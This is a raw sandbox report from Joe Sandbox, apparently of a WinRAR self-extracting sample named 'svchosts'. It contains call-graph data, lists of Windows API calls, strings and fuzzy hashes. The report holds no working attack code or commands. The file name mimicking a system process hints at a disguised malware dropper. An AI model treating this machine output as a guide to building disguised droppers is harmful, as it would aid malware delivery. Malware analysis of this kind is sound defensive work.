2a0085 2 API calls 24478->24479 24480 2aa349 OleInitialize 24479->24480 24481 2aa36c GdiplusStartup SHGetMalloc 24480->24481 24481->24316 24483 2a13d7 IsDBCSLeadByte 24482->24483 24483->24483 24484 2a13ef 24483->24484 24484->24318 24486 2abc8e 24485->24486 24487 2abda4 24486->24487 24488 2a179d CharUpperW 24486->24488 24540 29ecad 80 API calls ___scrt_fastfail 24486->24540 24487->24327 24487->24328 24488->24486 24491 2ae360 24490->24491 24492 2ad294 SetEnvironmentVariableW 24491->24492 24494 2ad2b7 24492->24494 24493 2ad2df 24493->24321 24494->24493 24495 2ad2d3 SetEnvironmentVariableW 24494->24495 24495->24493 24497 2aae0e 24496->24497 24498 2aae15 24496->24498 24541 2a9e1c FindResourceW 24497->24541 24499 2aae2a 24498->24499 24500 2aae1b GetObjectW 24498->24500 24502 2a9d1a 4 API calls 24499->24502 24500->24499 24503 2aae3d 24502->24503 24504 2aae80 24503->24504 24505 2aae5c 24503->24505 24506 2a9e1c 12 API calls 24503->24506 24515 29d31c 24504->24515 24555 2a9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24505->24555 24508 2aae4d 24506->24508 24508->24505 24510 2aae53 DeleteObject 24508->24510 24509 2aae64 24556 2a9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24509->24556 24510->24505 24512 2aae6d 24557 2a9f5d 8 API calls ___scrt_fastfail 24512->24557 24514 2aae74 DeleteObject 24514->24504 24566 29d341 24515->24566 24517 29d328 24606 29da4e GetModuleHandleW FindResourceW 24517->24606 24520 2a8835 24521 2ae24a new 8 API calls 24520->24521 24522 2a8854 24521->24522 24522->24340 24524 2aa3cc GdiplusShutdown OleUninitialize 24523->24524 24524->24356 24526->24348 24527->24354 24529 29ad09 GetVersionExW 24528->24529 24530 29ad45 24528->24530 24529->24530 24530->24449 24532 2ae360 24531->24532 24533 2a0092 GetSystemDirectoryW 24532->24533 24534 2a00aa 24533->24534 24535 2a00c8 24533->24535 24536 2a00bb LoadLibraryW 24534->24536 24535->24449 24536->24535 24537->24439 24539 2b35bb 24538->24539 24539->24470 24539->24539 24540->24486 24542 2a9e3e SizeofResource 24541->24542 24543 2a9e70 24541->24543 24542->24543 24544 2a9e52 LoadResource 24542->24544 24543->24498 24544->24543 24545 2a9e63 LockResource 24544->24545 24545->24543 24546 2a9e77 GlobalAlloc 24545->24546 24546->24543 24547 2a9e92 GlobalLock 24546->24547 24548 2a9f21 GlobalFree 24547->24548 24549 2a9ea1 __vswprintf_c_l 24547->24549 24548->24543 24550 2a9f1a GlobalUnlock 24549->24550 24558 2a9d7b GdipAlloc 24549->24558 24550->24548 24553 2a9f05 24553->24550 24554 2a9eef GdipCreateHBITMAPFromBitmap 24554->24553 24555->24509 24556->24512 24557->24514 24559 2a9d9a 24558->24559 24560 2a9d8d 24558->24560 24559->24550 24559->24553 24559->24554 24562 2a9b0f 24560->24562 24563 2a9b30 GdipCreateBitmapFromStreamICM 24562->24563 24564 2a9b37 GdipCreateBitmapFromStream 24562->24564 24565 2a9b3c 24563->24565 24564->24565 24565->24559 24567 29d34b _wcschr __EH_prolog 24566->24567 24568 29d37a GetModuleFileNameW 24567->24568 24569 29d3ab 24567->24569 24570 29d394 24568->24570 24608 2999b0 24569->24608 24570->24569 24572 29d407 24619 2b5a90 26 API calls 3 library calls 24572->24619 24573 299653 79 API calls 24574 29d7ab 24573->24574 24574->24517 24575 2a3781 76 API calls 24577 29d3db 24575->24577 24577->24572 24577->24575 24591 29d627 24577->24591 24578 29d41a 24620 2b5a90 26 API calls 3 library calls 24578->24620 24580 29d563 24580->24591 24638 299d30 77 API calls 24580->24638 24584 29d57d ___std_exception_copy 24585 299bf0 80 API calls 24584->24585 24584->24591 24588 29d5a6 ___std_exception_copy 24585->24588 24587 29d42c 24587->24580 24587->24591 24621 299e40 24587->24621 24629 299bf0 24587->24629 24637 299d30 77 API calls 24587->24637 24590 29d5b2 ___std_exception_copy 24588->24590 24588->24591 24639 2a137a MultiByteToWideChar 24588->24639 24590->24591 24592 29d72b 24590->24592 24595 29da0a 24590->24595 24597 29d9fa 24590->24597 24603 2a1596 WideCharToMultiByte 24590->24603 24643 29dd6b 50 API calls __vsnprintf 24590->24643 24644 2b58d9 26 API calls 3 library calls 24590->24644 24591->24573 24640 29ce72 76 API calls 24592->24640 24594 29d742 24598 29d771 24594->24598 24601 2a3781 76 API calls 24594->24601 24645 29ce72 76 API calls 24595->24645 24597->24517 24641 2b5a90 26 API calls 3 library calls 24598->24641 24600 29d78b 24642 2b5a90 26 API calls 3 library calls 24600->24642 24601->24594 24603->24590 24607 29d32f 24606->24607 24607->24520 24609 2999ba 24608->24609 24610 299a39 CreateFileW 24609->24610 24611 299a59 GetLastError 24610->24611 24612 299aaa 24610->24612 24614 29b66c 2 API calls 24611->24614 24613 299ae1 24612->24613 24616 299ac7 SetFileTime 24612->24616 24613->24577 24615 299a79 24614->24615 24615->24612 24617 299a7d CreateFileW GetLastError 24615->24617 24616->24613 24618 299aa1 24617->24618 24618->24612 24619->24578 24620->24587 24622 299e53 24621->24622 24623 299e64 SetFilePointer 24621->24623 24625 299e9d 24622->24625 24646 296fa5 75 API calls 24622->24646 24624 299e82 GetLastError 24623->24624 24623->24625 24624->24625 24627 299e8c 24624->24627 24625->24587 24627->24625 24647 296fa5 75 API calls 24627->24647 24630 299c03 24629->24630 24634 299bfc 24629->24634 24632 299c9e 24630->24632 24630->24634 24635 299cc0 24630->24635 24648 29984e 24630->24648 24632->24634 24660 296f6b 75 API calls 24632->24660 24634->24587 24635->24634 24636 29984e 5 API calls 24635->24636 24636->24635 24637->24587 24638->24584 24639->24590 24640->24594 24641->24600 24642->24591 24643->24590 24644->24590 24645->24597 24646->24623 24647->24625 24649 29985c GetStdHandle 24648->24649 24650 299867 ReadFile 24648->24650 24649->24650 24651 299880 24650->24651 24659 2998a0 24650->24659 24652 299989 GetFileType 24651->24652 24653 299887 24652->24653 24654 2998a8 GetLastError 24653->24654 24655 2998b7 24653->24655 24658 299895 24653->24658 24654->24655 24654->24659 24657 2998c7 GetLastError 24655->24657 24655->24659 24656 29984e GetFileType 24656->24659 24657->24658 24657->24659 24658->24656 24659->24630 24660->24634 24662 2b7430 _unexpected 24661->24662 24663 2b7448 24662->24663 24665 2b757e _abort GetModuleHandleW 24662->24665 24683 2ba3f1 EnterCriticalSection 24663->24683 24666 2b743c 24665->24666 24666->24663 24695 2b75c2 GetModuleHandleExW 24666->24695 24670 2b74c5 24672 2b74dd 24670->24672 24677 2b81f1 _abort 5 API calls 24670->24677 24671 2b7450 24671->24670 24681 2b74ee 24671->24681 24703 2b7f30 20 API calls _abort 24671->24703 24678 2b81f1 _abort 5 API calls 24672->24678 24673 2b750b 24687 2b753d 24673->24687 24674 2b7537 24704 2c1a19 5 API calls ___delayLoadHelper2@8 24674->24704 24677->24672 24678->24681 24684 2b752e 24681->24684 24683->24671 24705 2ba441 LeaveCriticalSection 24684->24705 24686 2b7507 24686->24673 24686->24674 24706 2ba836 24687->24706 24690 2b756b 24693 2b75c2 _abort 8 API calls 24690->24693 24691 2b754b GetPEB 24691->24690 24692 2b755b GetCurrentProcess TerminateProcess 24691->24692 24692->24690 24694 2b7573 ExitProcess 24693->24694 24696 2b760f 24695->24696 24697 2b75ec GetProcAddress 24695->24697 24699 2b761e 24696->24699 24700 2b7615 FreeLibrary 24696->24700 24698 2b7601 24697->24698 24698->24696 24701 2aec4a ___delayLoadHelper2@8 5 API calls 24699->24701 24700->24699 24702 2b7628 24701->24702 24702->24663 24703->24670 24705->24686 24707 2ba85b 24706->24707 24711 2ba851 24706->24711 24708 2ba458 _unexpected 5 API calls 24707->24708 24708->24711 24709 2aec4a ___delayLoadHelper2@8 5 API calls 24710 2b7547 24709->24710 24710->24690 24710->24691 24711->24709 24779 2aacd0 100 API calls 24822 2a19d0 26 API calls std::bad_exception::bad_exception 24714 2910d5 24719 295bd7 24714->24719 24720 295be1 __EH_prolog 24719->24720 24721 29b07d 82 API calls 24720->24721 24722 295bed 24721->24722 24726 295dcc GetCurrentProcess GetProcessAffinityMask 24722->24726

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 002A00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 002A00E4
                                                                        • Part of subcall function 002A00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002A00F6
                                                                        • Part of subcall function 002A00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002A0127
                                                                        • Part of subcall function 002A9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 002A9DAC
                                                                        • Part of subcall function 002AA335: OleInitialize.OLE32(00000000), ref: 002AA34E
                                                                        • Part of subcall function 002AA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002AA385
                                                                        • Part of subcall function 002AA335: SHGetMalloc.SHELL32(002D8430), ref: 002AA38F
                                                                        • Part of subcall function 002A13B3: GetCPInfo.KERNEL32(00000000,?), ref: 002A13C4
                                                                        • Part of subcall function 002A13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 002A13D8
                                                                      • GetCommandLineW.KERNEL32 ref: 002AD61C
                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 002AD643
                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 002AD654
                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 002AD68E
                                                                        • Part of subcall function 002AD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002AD29D
                                                                        • Part of subcall function 002AD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002AD2D9
                                                                      • CloseHandle.KERNEL32(00000000), ref: 002AD697
                                                                      • GetModuleFileNameW.KERNEL32(00000000,002EDC90,00000800), ref: 002AD6B2
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,002EDC90), ref: 002AD6BE
                                                                      • GetLocalTime.KERNEL32(?), ref: 002AD6C9
                                                                      • _swprintf.LIBCMT ref: 002AD708
                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 002AD71A
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 002AD721
                                                                      • LoadIconW.USER32(00000000,00000064), ref: 002AD738
                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 002AD789
                                                                      • Sleep.KERNEL32(?), ref: 002AD7B7
                                                                      • DeleteObject.GDI32 ref: 002AD7F0
                                                                      • DeleteObject.GDI32(?), ref: 002AD800
                                                                      • CloseHandle.KERNEL32 ref: 002AD843
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj.
                                                                      • API String ID: 788466649-3260780516
                                                                      • Opcode ID: f0ca31b8a2df973adaf1c1d2db162805dadfddb0625c1895ecf6e066a23a9fe9
                                                                      • Instruction ID: 03e79aad8f0e7e10cb00bb6ce4691b7bd16c076b49c1edd15dd19888d7125019
                                                                      • Opcode Fuzzy Hash: f0ca31b8a2df973adaf1c1d2db162805dadfddb0625c1895ecf6e066a23a9fe9
                                                                      • Instruction Fuzzy Hash: A561D571960241AFD720AF75FC4DF2A37ACEB46744F00042AF546922A1DFB89D64CB61

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 770 2a9e1c-2a9e38 FindResourceW 771 2a9e3e-2a9e50 SizeofResource 770->771 772 2a9f2f-2a9f32 770->772 773 2a9e52-2a9e61 LoadResource 771->773 774 2a9e70-2a9e72 771->774 773->774 775 2a9e63-2a9e6e LockResource 773->775 776 2a9f2e 774->776 775->774 777 2a9e77-2a9e8c GlobalAlloc 775->777 776->772 778 2a9f28-2a9f2d 777->778 779 2a9e92-2a9e9b GlobalLock 777->779 778->776 780 2a9f21-2a9f22 GlobalFree 779->780 781 2a9ea1-2a9ebf call 2af4b0 779->781 780->778 785 2a9f1a-2a9f1b GlobalUnlock 781->785 786 2a9ec1-2a9ee3 call 2a9d7b 781->786 785->780 786->785 791 2a9ee5-2a9eed 786->791 792 2a9f08-2a9f16 791->792 793 2a9eef-2a9f03 GdipCreateHBITMAPFromBitmap 791->793 792->785 793->792 794 2a9f05 793->794 794->792
                                                                      APIs
                                                                      • FindResourceW.KERNEL32(002AAE4D,PNG,?,?,?,002AAE4D,00000066), ref: 002A9E2E
                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,002AAE4D,00000066), ref: 002A9E46
                                                                      • LoadResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E59
                                                                      • LockResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E64
                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,002AAE4D,00000066), ref: 002A9E82
                                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,?,002AAE4D,00000066), ref: 002A9E93
                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002A9EFC
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 002A9F1B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 002A9F22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                                      • String ID: PNG
                                                                      • API String ID: 4097654274-364855578
                                                                      • Opcode ID: ba800453ff8154e0b42583a71051e5967caa84ca508ad68d9fc60464c79d3d48
                                                                      • Instruction ID: eee7a737e62a1c799d4eab6198a5434ca0b8eddc65b74750eba1b2ec6317af2e
                                                                      • Opcode Fuzzy Hash: ba800453ff8154e0b42583a71051e5967caa84ca508ad68d9fc60464c79d3d48
                                                                      • Instruction Fuzzy Hash: C7317071614706AFC7109F22EC4CE6BBBADFF86751B044919F906D2261EF72DC50CAA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 971 29a5f4-29a61f call 2ae360 974 29a691-29a69a FindNextFileW 971->974 975 29a621-29a632 FindFirstFileW 971->975 976 29a69c-29a6aa GetLastError 974->976 977 29a6b0-29a6b2 974->977 978 29a6b8-29a75c call 29fe56 call 29bcfb call 2a0e19 * 3 975->978 979 29a638-29a64f call 29b66c 975->979 976->977 977->978 980 29a761-29a774 977->980 978->980 986 29a66a-29a673 GetLastError 979->986 987 29a651-29a668 FindFirstFileW 979->987 989 29a675-29a678 986->989 990 29a684 986->990 987->978 987->986 989->990 992 29a67a-29a67d 989->992 993 29a686-29a68c 990->993 992->990 995 29a67f-29a682 992->995 993->980 995->993
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A628
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A65E
                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A66A
                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A692
                                                                      • GetLastError.KERNEL32(?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A69E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                      • String ID:
                                                                      • API String ID: 869497890-0
                                                                      • Opcode ID: 11284b9e44dc45152b507e2f188765de4d68ca9d21ea2e2b111091be7ae5dcd3
                                                                      • Instruction ID: 2c77768caab5feb91f6bdd80da4710356af3e35a157e65fea9f908d14a914742
                                                                      • Opcode Fuzzy Hash: 11284b9e44dc45152b507e2f188765de4d68ca9d21ea2e2b111091be7ae5dcd3
                                                                      • Instruction Fuzzy Hash: 07416172514342AFCB24EF68D984ADAF7ECBF49340F044A2AF599D3240D774A9648F92
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002,00000000), ref: 002B755E
                                                                      • TerminateProcess.KERNEL32(00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002,00000000), ref: 002B7565
                                                                      • ExitProcess.KERNEL32 ref: 002B7577
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: a22a5697a9581eeab855d3fc80375d0251edf137a0378aae3b1bf77935ea27f7
                                                                      • Instruction ID: fa46538ba426d3fc36e1af92057b88111ccee697536ccb07ca6a1f68438b0477
                                                                      • Opcode Fuzzy Hash: a22a5697a9581eeab855d3fc80375d0251edf137a0378aae3b1bf77935ea27f7
                                                                      • Instruction Fuzzy Hash: 14E0BF31014548AFCF21EF68ED0DE893B69EB50781F508414FD454A122CB35DE52DB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog_memcmp
                                                                      • String ID:
                                                                      • API String ID: 3004599000-0
                                                                      • Opcode ID: 2a9c99d0797bf8332f868d1a58d81d13d666ad2e7268e9399d62c3c220f854be
                                                                      • Instruction ID: b900aceb23f3d8c4c6643383be39dee96561699f3f6a1db9229a813af8c9c7b7
                                                                      • Opcode Fuzzy Hash: 2a9c99d0797bf8332f868d1a58d81d13d666ad2e7268e9399d62c3c220f854be
                                                                      • Instruction Fuzzy Hash: 3B820C70924246AEDF25DF74C495BFEB7A9BF16300F0C40BAEC599B142DB315AA4CB60
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 002AAEE5
                                                                        • Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                        • Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prologItemTextWindow
                                                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                      • API String ID: 810644672-8108337
                                                                      • Opcode ID: 9f51e7e858960b62129bb13e962c6d198daddb66f61ed4d0eadf543761e42d9c
                                                                      • Instruction ID: 22b91489c12eec02a19a189e8659da8c01c86ad40e26660742d62a7499ddc0ed
                                                                      • Opcode Fuzzy Hash: 9f51e7e858960b62129bb13e962c6d198daddb66f61ed4d0eadf543761e42d9c
                                                                      • Instruction Fuzzy Hash: 7642D471D64245AFEB22AFA4AC8DFBE7B7CAB13740F000156F605A6092CF744D64CB61

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 257 2a00cf-2a00ee call 2ae360 GetModuleHandleW 260 2a00f0-2a0107 GetProcAddress 257->260 261 2a0154-2a03b2 257->261 264 2a0109-2a011f 260->264 265 2a0121-2a0131 GetProcAddress 260->265 262 2a03b8-2a03c3 call 2b70dd 261->262 263 2a0484-2a04b3 GetModuleFileNameW call 29bc85 call 29fe56 261->263 262->263 274 2a03c9-2a03fa GetModuleFileNameW CreateFileW 262->274 279 2a04b5-2a04bf call 29acf5 263->279 264->265 265->261 266 2a0133-2a0152 265->266 266->261 276 2a0478-2a047f CloseHandle 274->276 277 2a03fc-2a040a SetFilePointer 274->277 276->263 277->276 280 2a040c-2a0429 ReadFile 277->280 286 2a04cc 279->286 287 2a04c1-2a04c5 call 2a0085 279->287 280->276 282 2a042b-2a0450 280->282 284 2a046d-2a0476 call 29fbd8 282->284 284->276 294 2a0452-2a046c call 2a0085 284->294 288 2a04ce-2a04d0 286->288 291 2a04ca 287->291 292 2a04f2-2a0518 call 29bcfb GetFileAttributesW 288->292 293 2a04d2-2a04f0 CompareStringW 288->293 291->288 296 2a051a-2a051e 292->296 301 2a0522 292->301 293->292 293->296 294->284 296->279 300 2a0520 296->300 302 2a0526-2a0528 300->302 301->302 303 2a052a 302->303 304 2a0560-2a0562 302->304 307 2a052c-2a0552 call 29bcfb GetFileAttributesW 303->307 305 2a0568-2a057f call 29bccf call 29acf5 304->305 306 2a066f-2a0679 304->306 317 2a0581-2a05e2 call 2a0085 * 2 call 29ddd1 call 29400a call 29ddd1 call 2a9f35 305->317 318 2a05e7-2a061a call 29400a AllocConsole 305->318 313 2a055c 307->313 314 2a0554-2a0558 307->314 313->304 314->307 315 2a055a 314->315 315->304 324 2a0667-2a0669 ExitProcess 317->324 323 2a061c-2a0661 GetCurrentProcessId AttachConsole call 2b35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 002A00E4
                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002A00F6
                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002A0127
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002A03D4
                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A03F0
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002A0402
                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,002C3BA4,00000000), ref: 002A0421
                                                                      • CloseHandle.KERNEL32(00000000), ref: 002A0479
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002A048F
                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 002A04E7
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 002A0510
                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 002A054A
                                                                        • Part of subcall function 002A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
                                                                        • Part of subcall function 002A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2
                                                                      • _swprintf.LIBCMT ref: 002A05BE
                                                                      • _swprintf.LIBCMT ref: 002A060A
                                                                        • Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D
                                                                      • AllocConsole.KERNEL32 ref: 002A0612
                                                                      • GetCurrentProcessId.KERNEL32 ref: 002A061C
                                                                      • AttachConsole.KERNEL32(00000000), ref: 002A0623
                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002A0649
                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 002A0650
                                                                      • Sleep.KERNEL32(00002710), ref: 002A065B
                                                                      • FreeConsole.KERNEL32 ref: 002A0661
                                                                      • ExitProcess.KERNEL32 ref: 002A0669
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
